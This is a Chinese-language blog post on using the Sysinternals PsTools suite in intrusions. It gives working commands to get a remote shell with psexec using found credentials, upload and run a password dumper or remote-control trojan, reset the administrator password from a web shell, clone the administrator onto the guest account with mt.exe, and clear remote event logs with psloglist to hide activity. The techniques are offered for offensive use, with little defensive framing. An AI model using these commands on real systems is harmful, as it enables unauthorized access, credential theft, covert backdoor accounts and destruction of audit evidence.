pstools套件在渗透中的应用详解

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/SysProgram/article/details/13001781

其实接触pstool很久了,但是据我观察用pstools套件在渗透中的应用的介绍却比较少。

当然玩bt5的同学可能常常用到,小菜就写一篇关于pstools套件在渗透中的应用进行详解。

pstool的介绍

PsTools是Sysinternals Suite中一款排名靠前的一个安全管理工具套件。现在被微软收购。目前pstools中含有12款各式各样的小工具。如果将它们灵活的运用,将会在渗透中收到奇效。所有的pstool第一次运行时都会弹框。可以用–accepteula这个参数绕过。

还有所有的pstool都支持IP$,一旦IP$共享是连接的就不用输入-u 和-p这两个参数。

如何建立IP$连接。命令如下:

Net user \\目标ip\ 密码 /user:用户

Net user \\192.168.1.3\ 123456 /user:test

建立后所有的ps工具都将可以不用输入用户和密码了。

其中12款工具简介如下:

◆PsExec - 远程执行进程

◆PsFile - 显示远程打开的文件

◆PsGetSid - 显示计算机或用户的 SID

◆PsInfo - 列出有关系统的信息

◆PsKill - 按名称或进程 ID 终止进程

◆PsList - 列出有关进程的详细信息

◆PsLoggedOn - 查看在本地通过资源共享(包含所有资源)登录的用户

◆PsLogList - 转储事件日志记录

◆PsPasswd - 更改帐户密码

◆PsService - 查看和控制服务

◆PsShutdown - 关闭并重新启动(可选)计算机

◆PsSuspend - 暂停进程

这里讲对其中的几个工具进行详解,其他的将只介绍用法。

下载地址:http://download.sysinternals.com/files/PSTools.zip

psexec的应用详解

Pstools中最强大最常利用的工具就属psexec这款工具。这款工具的本意是替代telnet这种不安全的管理方式。它最大的特点就属无需安装客服端程序就可以远程操作服务器。

简单来说,就是一旦你知道服务器或者电脑的用户名和密码,你就可以利用它远程执行系统命令。这样一款工具放到渗透当中真是太淫荡了。它适用于windows NT/2x/xp/vista

下面介绍详细参数:

-u 远程计算机的用户名

-p 远程计算机用户对应密码

-c <[路径]文件名>:拷贝文件到远程机器并运行(注意:运行结束后文件会自动删除)

-d 不等待程序执行完就返回 (意思就是,当你执行一个程序无需等到他结束才返回信息)

-h用于目标系统是Vista或更高版本

其他参数就不做介绍,这里主要是讲用法。

远程获取一个cmdshell

比如我再渗透中扫描到目标机(192.168.1.3)的一个用户名(test)和密码(123456)。

那我们的命令就是:

psexec \\目标ip -u 用户名 -p 密码 进程名

psexec \\192.168.1.3 –u test –p 123456 cmd.exe

看下图,这是成功连接到一台远程服务器,并获得一个cmdshell,shell权限即位当前用户权限。

这里还将提到的是由于windows策略,将不允许空密码登陆。

可能有些机油对用户权限登陆还有疑虑,什么用户才可以登陆。

我这建立了一个属于guest的一个用户我们来看看它是否能连接。

经过测试,比guest权限大的用户组都可以远程登陆。

IIS_WPG用户组的无法远程连接,但是你不用担心,一般属于IIS_WPG用户组的用户一般也属于guest用户组。

有关用户组相关的介绍请围观法客周年庆之提权专题

下载地址: http://www.2cto.com/ebook/201211/35554.html

获取cmdshell的介绍就到这里。一旦获得一个cmdshell后面的渗透将会比较轻松。

经过测试,用最新版的pstools,windows2008 win7 都能连接成功,win8由于没有win8系统,就未测试,应该是能行的,毕竟这是微软的管理工具。

Win7连接示意图:

程序上传并执行

首先现在在本地配置一个将上传到服务器上运行的程序到H盘根目录。这里用抓取系统密码的神器getpass来演示。H:\getpass.exe

程序上传并执行命令如下:

Psexec \\192.169.1.3 –u test –p 12345 –c H:\getpass.exe –d

最后一个-d的参数可有可无~~~

只是怕程序远程运行后会卡住而无法返回信息。

测试如图:

当然你也可运行一个远控木马这些都可以~~~

Psexec 的介绍就到这里了。

pspasswd的应用详解

Pspasswd是一个用来更改用户密码的工具,支持远程密码修改和本地密码修改。这款工具的特点就是不依靠net,exe程序进行密码修改。

本地修改命令如下:

pspasswd administrator yueyan

演示图如下:

远程命令如下:

pspasswd \\192.168.1.3 –u administrator –p 123456 guest yueyan

命令的意思就是,用administrator这个管理员账户登录后修改用户guest的密码为yueyan

相对来说本地修改密码的功能更强大一些。

我这将介绍个实例:

我的一个好基友Lynn得到一个jsp马,并且是nt authority\system权限。但是无法添加用户,且无法用net修改管理员密码。抓取hash密码大于14位,LMhash无效,本地又为搭建彩虹表,网上破解无果。Hash传递登陆被拦截。但是机油lynn却一直想用administrator这个用户登陆进去,当然方法还有很多,比如: mimikatz.exe抓取明文密码等,这里我将介绍pspasswd的妙用。

我们想用administrator这个账户登陆进去。很简单,直接上传一个pspasswd上服务器。

执行下面的命令:

首先执行D:\web|pspasswd.exe –accepteula (第一次执行,表示许可执行的意思)

D:\web|pspasswd.exe administrator yueyan

就会成功修改administrator的密码。

这里能修改密码的原因是pspasswd不是调用net.exe进行密码修改。

上述介绍常常配合mt.exe进行用户克隆。这里简单介绍:

(关于mt.exe的详细介绍请访问:【工具】mt.exe的详细介绍)

首先mt.exe查看用户sid,比较后看是否有克隆账户

Mt -chkuser

比较后,没有克隆账户,我们选择guest这个账户进行克隆:

Mt –clone administrator guest

然后配合pspasswd修改密码:

Pspasswd guest yueyan

就这样成功克隆一个账户,并能成功登陆访问。

Pspasswd的功能就介绍到这里。

pskill+psinfo+pslist的应用详解

首先是介绍pskill.

如果你想远程结束远程主机上的一个进程,你可以使用pskill。

我们就介绍一下常用的命令:

比如我们想远程关闭远程主机正在运行的cmd这个进程,可以用pskill进行杀掉。命令如下:

pskill \\192.168.1.3 –u test –p 123456 cmd.exe

命令很简单~~~~

我再介绍psinfo的相关应用。

基本参数是:

-h 显示已经安装的补丁信息

-s 显示已安装的软件信息

-d 显示磁盘信息

如果我们想看远程主机的基本信息,命令如下:

psinfo –h –s –d \\192.168.1.3 –u administrator –p 123456

接下来就是pslist。

主要特点是,显示本地或者远程计算机的进程运行情况。

主要参数:

-m 显示内存信息

-x 显示进程,内存和线程

-t 显示进程树

-s n 在任务管理器模式先运行,n指定秒,以esc结束。

-r n 任务管理器模式刷新速率,n指秒

例如我们想看远程计算机的进程运行情况,命令如下:

Pslist –x \\192.168.1.3 –u test –p 123456

效果图如下:

其他ps工具介绍:

PSLOGGEDON:查看指定计算机的本地及远程登录的用户和登录时间。必须建立在IP$共享下才可以使用这个工具。

命令如下:

Psloggedon –l \\192.168.1.3

PSLOGLIST:事件日志转储及管理。

这个对于渗透测试是非常有用的,它最大的特点就是远程清理系统日志。

常用:

psloglist \\72.56.17.74 application -c > nul

psloglist \\72.56.17.74 system -c > nul

psloglist \\72.56.17.74 security -c > nul

分别是清理应用程序日志,系统运行日志,安全日志。

PSSERVICE:管理服务。

常用:

psservice query messenger

查询messenger服务的相关信息。

最重要的项目是:服务名称、显示名称、服务描述、服务类型、服务状态。

psservice config messenger

查询服务的配置信息。

最重要的项目是:服务名称、服务描述、服务类型、服务启动类型、服务错误控制级别、可执行文件的路径等等。

PSSHUTDOWN:关机工具。

常用命令:

Psshutdown –s –t 60

60秒后关机。

下面几个不常用,就介绍下:

PsFile - 显示远程打开的文件

Psfile \\192.168.1.3

PsGetSid - 显示计算机或用户的 SID

Psgetsid \\192.168.1.3

PsSuspend - 暂停进程

Pssuspend \\192.168.1.3 –u test –p 123456 cmd,exe


阅读更多
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页